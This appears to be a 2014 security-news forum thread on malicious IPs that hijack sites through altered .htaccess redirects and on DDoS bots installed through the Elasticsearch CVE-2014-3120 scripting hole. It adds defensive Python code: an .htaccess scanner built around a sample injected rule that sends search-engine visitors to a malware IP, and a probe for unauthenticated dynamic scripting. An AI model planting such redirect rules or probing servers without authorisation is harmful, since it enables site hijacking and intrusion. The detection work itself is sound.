- https://www.google.com/safebrowsing/diagnostic?site=AS:16276


 8 
 on: July 29, 2014, 07:07:37  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Something evil on 31.210.96.155, ...156, ...157 and ...158 (31.210.96.152/29)
- http://blog.dynamoo.com/2014/07/something-evil-on-3121096155-3121096156.html
29 July 2014 - "I don't know quite what the exploit kit of the month is here, but the IP addresses 31.210.96.155, 31.210.96.156, 31.210.96.157 and 31.210.96.158 are currently serving up malware using -hijacked- GoDaddy domains, and are targeting victim websites by altering their .htaccess files** to intercept traffic coming from search engines such as Google. These IP addresses have been used for malware for some time*...VirusTotal reports for these IPs are pretty poor [1] [2] [3] [4]. I assume that they form part of an allocation 31.210.96.152/29, and I would very strongly recommend blocking that range... these appear to be subdomains of -hijacked- GoDaddy domains... I would recommend permablocking the following IP range and temporarily blocking the following domains:
31.210.96.152/29 ..."
(Long list at the dynamoo URL above.)
* http://c-apt-ure.blogspot.co.uk/2014/06/two-years-later.html

** http://www.symantec.com/connect/blogs/trojanmilicenso-infection-through-htaccess-redirection

1] 31.210.96.155: https://www.virustotal.com/en-gb/ip-address/31.210.96.155/information/
2] 31.210.96.156: https://www.virustotal.com/en-gb/ip-address/31.210.96.156/information/
3] 31.210.96.157: https://www.virustotal.com/en-gb/ip-address/31.210.96.157/information/
4] 31.210.96.158: https://www.virustotal.com/en-gb/ip-address/31.210.96.158/information/
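Added example, not from dynamoo's post: a scanner for the .htaccess trick described here, where RewriteCond lines on HTTP_REFERER (or the User-Agent) send only visitors arriving from a search engine to an off-site URL, so the site owner browsing directly never sees it. It also checks literal-IP redirect targets against the 31.210.96.152/29 range the post recommends blocking. The .htaccess content and hostnames are constructed.

```python
import ipaddress
from urllib.parse import urlsplit

SEARCH_ENGINES = ("google", "bing", "yahoo", "yandex", "ask", "aol", "baidu")
CRAWLER_UAS = ("googlebot", "bingbot", "slurp", "yandex")

# The /29 the post recommends permablocking; used to flag literal-IP redirect targets.
BLOCKED_NETS = [ipaddress.ip_network("31.210.96.152/29")]


def is_blocked_ip(ip):
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in BLOCKED_NETS)


def scan_htaccess(text, site_hosts):
    """Flag RewriteRule/ErrorDocument targets that push search-engine or crawler traffic
    off-site. site_hosts: hostnames the site legitimately redirects to."""
    findings = []
    conds = []   # RewriteCond lines accumulated for the next RewriteRule
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        directive = parts[0].lower()
        if directive == "rewritecond" and len(parts) >= 3:
            conds.append((lineno, parts[1].upper(), parts[2].lower()))
        elif directive == "rewriterule" and len(parts) >= 3:
            target = parts[2]
            referer_hit = [c for c in conds if "HTTP_REFERER" in c[1]
                           and any(s in c[2] for s in SEARCH_ENGINES)]
            ua_hit = [c for c in conds if "HTTP_USER_AGENT" in c[1]
                      and any(b in c[2] for b in CRAWLER_UAS)]
            host = (urlsplit(target).hostname or "").lower() if "://" in target else ""
            offsite = bool(host) and host not in site_hosts
            if offsite and (referer_hit or ua_hit):
                findings.append({"line": lineno, "kind": "referrer_hijack", "target": target,
                                 "why": "search-engine referrers" if referer_hit else "crawler user-agents",
                                 "blocked_ip": is_blocked_ip(host)})
            conds = []
        elif directive == "errordocument" and len(parts) >= 3 and "://" in parts[2]:
            host = (urlsplit(parts[2]).hostname or "").lower()
            if host not in site_hosts:
                findings.append({"line": lineno, "kind": "offsite_errordocument", "target": parts[2],
                                 "why": "error page served from another host",
                                 "blocked_ip": is_blocked_ip(host)})
    return findings


# Constructed .htaccess: one legitimate redirect, one injected referrer hijack, one off-site 404.
SAMPLE_HTACCESS = r"""
RewriteEngine On
# legitimate canonical-host redirect: stays on the site's own hostname
RewriteCond %{HTTP_HOST} ^example\.org$ [NC]
RewriteRule ^(.*)$ http://www.example.org/$1 [R=301,L]
# injected block: only visitors arriving from a search engine are bounced off-site
RewriteCond %{HTTP_REFERER} .*google.* [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.* [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [NC]
RewriteRule ^(.*)$ http://31.210.96.156/in.php?q=$1 [R=302,L]
ErrorDocument 404 http://abc.hijacked-example.com/404.php
"""

if __name__ == "__main__":
    for f in scan_htaccess(SAMPLE_HTACCESS, {"example.org", "www.example.org"}):
        print(f"line {f['line']}: {f['kind']} -> {f['target']} ({f['why']}; blocked range: {f['blocked_ip']})")
```

Run it over every .htaccess on a shared host (find docroot -name .htaccess); the injected block is usually appended at the bottom, below the site's own rules, which is why it survives a casual look.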


 9 
 on: July 29, 2014, 02:01:58  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

malvertising, fiesta, magnitude, zegost domains
- http://www.malwaredomains.com/?p=3639
July 28th, 2014 - "Added domains associated with Rig EK, Fiesta EK, zegost.b, Nuclear EK, malvertising, and other badness. Sources: malware-traffic-analysis.net, isc.sans.org, google.com/safebrowsing, sitecheck.sucuri.net and others..."


 10 
 on: July 28, 2014, 16:09:07  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Amazon cloud attackers install DDoS bots ...
Attackers are targeting Amazon EC2 instances with Elasticsearch 1.1.x installed
- https://www.computerworld.com/s/article/9249991/Attackers_install_DDoS_bots_on_Amazon_cloud_exploit_Elasticsearch_weakness
July 28, 2014 - "Attackers are exploiting a vulnerability in distributed search engine software Elasticsearch to install DDoS malware on Amazon and possibly other cloud servers. Elasticsearch is an increasingly popular open-source search engine server developed in Java that allows applications to perform full-text search for various types of documents through a REST API (representational state transfer application programming interface). Because it has a distributed architecture that allows for multiple nodes, Elasticsearch is commonly used in cloud environments. It can be deployed on Amazon Elastic Compute Cloud (EC2), Microsoft Azure, Google Compute Engine and other cloud platforms. Versions 1.1.x of Elasticsearch have support for active scripting through API calls in their default configuration. This feature poses a security risk because it doesn't require authentication and the script code is -not- sandboxed. Security researchers reported earlier this year that attackers can exploit Elasticsearch's scripting capability to execute arbitrary code on the underlying server, the issue being tracked as CVE-2014-3120* in the Common Vulnerabilities and Exposures (CVE) database. Elasticsearch's developers haven't released a patch for the 1.1.x branch, but starting with version 1.2.0, released on May 22, dynamic scripting is disabled by default. Last week security researchers from Kaspersky Lab** found new variants of Mayday, a Trojan program for Linux that's used to launch distributed denial-of-service (DDoS) attacks. The malware supports several DDoS techniques, including DNS amplification. One of the new Mayday variants was found running on compromised Amazon EC2 server instances, but this is not the only platform being misused... Users of Elasticsearch 1.1.x should upgrade to a newer version and those who require the scripting functionality should follow the security recommendations made by the software's developers in a blog post*** on July 9."

* https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3120 - 6.8

- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4326 - 7.5 (HIGH)

- http://www.elasticsearch.org/blog/logstash-1-4-2/
Jun 24
Changelog for 1.4.2
- https://github.com/elasticsearch/logstash/blob/master/CHANGELOG

** https://securelist.com/blog/virus-watch/65192/elasticsearch-vuln-abuse-on-amazon-cloud-and-more-for-ddos-and-profit/

*** http://www.elasticsearch.org/blog/scripting-security/

- https://www.found.no/foundation/elasticsearch-security/#staying-safe-while-developing-with-elasticsearch

Insecure default in Elasticsearch enables remote code execution
- http://bouk.co/blog/elasticsearch-rce/
May 2014 - "... How to secure against this vulnerability..."
___

>> http://www.rapid7.com/db/modules/exploit/multi/elasticsearch/script_mvel_rce
___

- http://atlas.arbor.net/briefs/index#-961013762
High Severity
31 Jul 2014
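Added example, not from the Computerworld article or from Elasticsearch: two checks for the exposure described above. The first reads the node version and the elasticsearch.yml settings, since 1.1.x ships with dynamic scripting enabled and the fix short of upgrading is script.disable_dynamic: true. The second is a harmless capability probe, a script field that evaluates 1+1, whose response shows whether the node will run client-supplied scripts. The HTTP transport is injected and the responses are constructed; the error wording matched is an assumption based on the 1.x ScriptException message.

```python
import json
import re


def parse_version(v):
    return tuple(int(x) for x in re.match(r"(\d+)\.(\d+)\.(\d+)", v).groups())


def dynamic_scripting_enabled(version, settings):
    """settings: flat dict of elasticsearch.yml keys. True means an unauthenticated
    client can have the node evaluate arbitrary MVEL (CVE-2014-3120)."""
    explicit = settings.get("script.disable_dynamic")
    if explicit is not None:
        return str(explicit).lower() not in ("true", "yes", "1")
    return parse_version(version) < (1, 2, 0)   # 1.2.0 flipped the default to disabled


# Harmless capability probe: ask the node to evaluate a script inside a search.
PROBE_PATH = "/_search"
PROBE_BODY = json.dumps({"size": 1, "query": {"match_all": {}},
                         "script_fields": {"probe": {"script": "1+1"}}})

# Assumption: the 1.x node answers a refused script with a message of this shape.
DISABLED_RE = re.compile(r"dynamic scripting.*disabled", re.I)


def classify_probe_response(status, body_text):
    if DISABLED_RE.search(body_text):
        return "dynamic-scripting-disabled"
    if status == 200:
        try:
            hits = json.loads(body_text)["hits"]["hits"]
        except (ValueError, KeyError, TypeError):
            return "unknown"
        if any(h.get("fields", {}).get("probe") == [2] for h in hits):
            return "dynamic-scripting-enabled"
    return "unknown"   # e.g. no documents to evaluate the script against


def probe(http_post, base_url="http://127.0.0.1:9200"):
    """http_post(url, body) -> (status, text). Injected so this runs offline; wire it to
    urllib or requests only against a node you are authorised to test."""
    status, text = http_post(base_url + PROBE_PATH, PROBE_BODY)
    return classify_probe_response(status, text)


# Constructed responses standing in for a vulnerable node and a hardened one.
ENABLED_RESPONSE = (200, json.dumps(
    {"hits": {"total": 1, "hits": [{"_index": "logs", "_id": "1", "fields": {"probe": [2]}}]}}))
DISABLED_RESPONSE = (500, json.dumps(
    {"error": "SearchPhaseExecutionException[...]; nested: ScriptException[dynamic scripting disabled]"}))

if __name__ == "__main__":
    print("1.1.1 default config:", dynamic_scripting_enabled("1.1.1", {}))
    print("1.1.1 hardened:      ", dynamic_scripting_enabled("1.1.1", {"script.disable_dynamic": "true"}))
    print("probe, vulnerable:   ", probe(lambda url, body: ENABLED_RESPONSE))
    print("probe, hardened:     ", probe(lambda url, body: DISABLED_RESPONSE))
```

Disabling scripting does not make port 9200 safe to expose: the REST API still has no authentication, so the node should sit behind a firewall or proxy regardless of the probe's verdict.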

